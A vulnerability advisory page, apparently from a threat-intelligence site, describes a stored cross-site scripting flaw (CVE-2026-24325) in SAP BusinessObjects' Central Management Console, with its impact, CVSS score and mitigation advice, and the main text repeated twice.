CVE-2026-24325: CWE-79: Improper Neutralization of Input During Web Page Generation in SAP_SE SAP BusinessObjects Enterprise (Central Management Console)
CVE-2026-24325 is a stored Cross-Site Scripting (XSS) vulnerability in SAP BusinessObjects Enterprise Central Management Console. It arises from improper encoding of user-controlled inputs, allowing an authenticated admin user to inject malicious JavaScript that executes when other users visit the compromised page. The vulnerability impacts confidentiality and integrity to a limited extent but does not affect availability. Exploitation requires high privileges and user interaction, limiting its ease of exploitation. No known exploits are currently reported in the wild. The vulnerability affects versions ENTERPRISE 430, 2025, and 2027 of the product. The CVSS score is 4. 8 (medium severity). European organizations using SAP BusinessObjects Enterprise, especially in countries with significant SAP deployments, should prioritize patching and input validation controls to mitigate risk.
AI Analysis
Technical Summary
CVE-2026-24325 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79, found in SAP BusinessObjects Enterprise Central Management Console. The root cause is insufficient neutralization of user-supplied input during web page generation, which allows an authenticated administrator to inject malicious JavaScript code into the web interface. When other users access the compromised page, the injected script executes in their browsers, potentially leading to session hijacking, credential theft, or unauthorized actions within the application context. The vulnerability requires an attacker to have high privileges (admin user) and involves user interaction (visiting the compromised page). The CVSS v3.1 score is 4.8, reflecting medium severity, with low impact on confidentiality and integrity, and no impact on availability. Affected versions include ENTERPRISE 430, 2025, and 2027. No public exploits are known, but the vulnerability poses a risk in environments where multiple administrators or users access the Central Management Console. The vulnerability highlights the need for proper input encoding and sanitization in web applications, especially those managing critical business intelligence data.
Potential Impact
For European organizations, this vulnerability could allow malicious administrators to execute arbitrary JavaScript in the context of the SAP BusinessObjects Enterprise Central Management Console. While the impact on confidentiality and integrity is low, attackers could potentially steal session tokens, manipulate user interface elements, or perform unauthorized actions on behalf of other users, undermining trust and operational security. The lack of availability impact reduces the risk of service disruption, but the exploitation could facilitate further attacks or data leakage. Organizations relying heavily on SAP BusinessObjects for business intelligence and reporting may face reputational damage and compliance risks if sensitive data is exposed or manipulated. The requirement for admin privileges and user interaction limits the attack surface but does not eliminate the risk in environments with multiple privileged users or insufficient internal controls.
Mitigation Recommendations
1. Apply official patches or updates from SAP as soon as they become available for the affected versions (ENTERPRISE 430, 2025, 2027). 2. Implement strict input validation and output encoding on all user inputs in the Central Management Console to prevent injection of malicious scripts. 3. Limit the number of users with administrative privileges and enforce the principle of least privilege to reduce the risk of insider threats. 4. Conduct regular security training for administrators to recognize and avoid introducing malicious content. 5. Monitor logs and user activities within the Central Management Console for unusual behavior indicative of exploitation attempts. 6. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in the web interface. 7. Use multi-factor authentication (MFA) for admin accounts to reduce the risk of credential compromise. 8. Regularly review and audit configurations and customizations in SAP BusinessObjects to detect potential injection points.
Affected Countries
Germany, France, United Kingdom, Netherlands, Switzerland, Sweden, Italy, Spain
CVE-2026-24325: CWE-79: Improper Neutralization of Input During Web Page Generation in SAP_SE SAP BusinessObjects Enterprise (Central Management Console)
Description
CVE-2026-24325 is a stored Cross-Site Scripting (XSS) vulnerability in SAP BusinessObjects Enterprise Central Management Console. It arises from improper encoding of user-controlled inputs, allowing an authenticated admin user to inject malicious JavaScript that executes when other users visit the compromised page. The vulnerability impacts confidentiality and integrity to a limited extent but does not affect availability. Exploitation requires high privileges and user interaction, limiting its ease of exploitation. No known exploits are currently reported in the wild. The vulnerability affects versions ENTERPRISE 430, 2025, and 2027 of the product. The CVSS score is 4. 8 (medium severity). European organizations using SAP BusinessObjects Enterprise, especially in countries with significant SAP deployments, should prioritize patching and input validation controls to mitigate risk.
AI-Powered Analysis
Technical Analysis
CVE-2026-24325 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79, found in SAP BusinessObjects Enterprise Central Management Console. The root cause is insufficient neutralization of user-supplied input during web page generation, which allows an authenticated administrator to inject malicious JavaScript code into the web interface. When other users access the compromised page, the injected script executes in their browsers, potentially leading to session hijacking, credential theft, or unauthorized actions within the application context. The vulnerability requires an attacker to have high privileges (admin user) and involves user interaction (visiting the compromised page). The CVSS v3.1 score is 4.8, reflecting medium severity, with low impact on confidentiality and integrity, and no impact on availability. Affected versions include ENTERPRISE 430, 2025, and 2027. No public exploits are known, but the vulnerability poses a risk in environments where multiple administrators or users access the Central Management Console. The vulnerability highlights the need for proper input encoding and sanitization in web applications, especially those managing critical business intelligence data.
Potential Impact
For European organizations, this vulnerability could allow malicious administrators to execute arbitrary JavaScript in the context of the SAP BusinessObjects Enterprise Central Management Console. While the impact on confidentiality and integrity is low, attackers could potentially steal session tokens, manipulate user interface elements, or perform unauthorized actions on behalf of other users, undermining trust and operational security. The lack of availability impact reduces the risk of service disruption, but the exploitation could facilitate further attacks or data leakage. Organizations relying heavily on SAP BusinessObjects for business intelligence and reporting may face reputational damage and compliance risks if sensitive data is exposed or manipulated. The requirement for admin privileges and user interaction limits the attack surface but does not eliminate the risk in environments with multiple privileged users or insufficient internal controls.
Mitigation Recommendations
1. Apply official patches or updates from SAP as soon as they become available for the affected versions (ENTERPRISE 430, 2025, 2027). 2. Implement strict input validation and output encoding on all user inputs in the Central Management Console to prevent injection of malicious scripts. 3. Limit the number of users with administrative privileges and enforce the principle of least privilege to reduce the risk of insider threats. 4. Conduct regular security training for administrators to recognize and avoid introducing malicious content. 5. Monitor logs and user activities within the Central Management Console for unusual behavior indicative of exploitation attempts. 6. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in the web interface. 7. Use multi-factor authentication (MFA) for admin accounts to reduce the risk of credential compromise. 8. Regularly review and audit configurations and customizations in SAP BusinessObjects to detect potential injection points.
Affected Countries
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- sap
- Date Reserved
- 2026-01-21T22:15:36.673Z
- Cvss Version
- 3.1
- State
- PUBLISHED
Threat ID: 698aaa0c4b57a58fa1c64d68
Added to database: 2/10/2026, 3:46:20 AM
Last enriched: 2/17/2026, 9:41:55 AM
Last updated: 2/21/2026, 12:19:26 AM
Views: 19
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
CVE-2026-27203: CWE-15: External Control of System or Configuration Setting in YosefHayim ebay-mcp
HighCVE-2026-27168: CWE-122: Heap-based Buffer Overflow in HappySeaFox sail
HighCVE-2026-27134: CWE-287: Improper Authentication in strimzi strimzi-kafka-operator
HighCVE-2026-27190: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in denoland deno
HighCVE-2026-27026: CWE-770: Allocation of Resources Without Limits or Throttling in py-pdf pypdf
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.